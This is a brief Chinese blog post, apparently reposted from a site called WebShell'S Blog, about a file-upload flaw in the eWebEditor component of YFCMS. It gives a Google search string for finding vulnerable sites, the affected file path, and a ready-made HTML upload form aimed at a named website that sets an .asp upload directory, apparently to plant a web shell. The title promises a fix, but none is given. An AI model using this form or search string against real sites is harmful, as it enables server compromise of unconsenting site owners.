YFCMS之ewebeditor上传漏洞及修复
google关键字:intext:版权所有:yfcms
利用文件:admin\WebEditor\asp\upload.asp
利用代码:
<form action="http://www.badguest.cn/admin/WebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=st999.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
这里有个前提 ,要知道网站的后台目录才行。
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/746.html
威武!!!!